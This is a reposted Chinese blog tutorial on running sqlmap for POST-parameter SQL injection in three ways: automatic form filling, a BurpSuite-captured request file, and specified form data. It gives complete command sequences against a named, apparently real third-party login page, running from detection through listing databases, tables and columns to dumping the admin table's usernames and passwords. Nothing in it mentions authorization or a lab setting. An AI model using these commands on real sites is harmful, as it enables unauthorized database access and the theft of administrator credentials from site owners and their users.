Sqlmap POST注入 三种方法(转载)

不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!

 

一、自动填写表单

自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:

 

1、判断是否有post注入?

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms

出来的提示,一路回车就可以了!

 

结果如下图:

Sqlmap POST注入

从这里,可以得到数据库是:Microsoft SQL Server,也就是mssql;

总之,一句话总结即可!IIS+ASP+windows+mssql;

 

这里重点说一下,Sql Server(mssql)数据库类似于mysql,数据库结构如下:

  • 数据库A -> 表名 -> 列名 -> 数据
  • 数据库B -> 表名 -> 列名 -> 数据

 

因此:mssql注入和mysql注入其实都差不多。

 

2、查找数据库

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --dbs

Sqlmap POST注入

 

注意:如果遇到数据库非常多,而且我们也不知道管理用户名和密码存放在哪个数据库中?又应该怎么办呢?

 

查找当前的数据库

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --current-db

后面就不截图了,都很简单,这里找到了当前数据库是“vip_0730"。

 

3、查找表名

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 --tables

 

4、查找列名

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin --columns

 

5、爆出数据

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin -C user_name,user_pwd --dump

从这里就可以爆出 vip_0730 数据库 中 admin 表的 user_name 和 user_pwd 列的数据了。

 

二、Sqlmap结合BurpSuite

这是Sqlmap工具POST注入的第二种方法;这种方法要比自动填写表单准确性高些,但是:自动表单会简单快一点。具体步骤如下:

 

1、抓包

 

2、全选抓包的数据,右键 -> Copy 就可以保存到 1.txt 文档中;

BurpSuite抓包

3、sqlmap -r 指定文件

root@Kali:~# sqlmap -r '/home/1.txt'

 

4、查找当前数据库

root@Kali:~# sqlmap -r '/home/1.txt' --current-db

 

后面的这些和前面的就没什么区别了,就不继续讲重复的内容了。下面直接来说说Sqlmap POST注入第三种方法吧!

 

三、指定表单注入

指定表单注入是Sqlmap POST注入第三种方法,这个其实也需要抓包的。当然,不抓也可以,查看源代码等什么的也不是不可以,只是抓包比较精准而已。只要能知道指定的表单数据就可以了!

 

例如:我这里用指定表单注入,你只要能获取到“userid=aaa&passwd=bbbb”这个就可以了,不管你是用哪种途径获取到的都可以。

sqlmap post注入 指定表单注入

 

1、检测是否有注入?

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb"

 

2、查找当前数据库

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb" --current-db

 ——————————————————————————————————————————————

转载地址https://www.fujieace.com/penetration-test/sqlmap-post.html

posted @ 2020-05-24 21:28  菖蒲依依  阅读(10961)  评论(0编辑  收藏  举报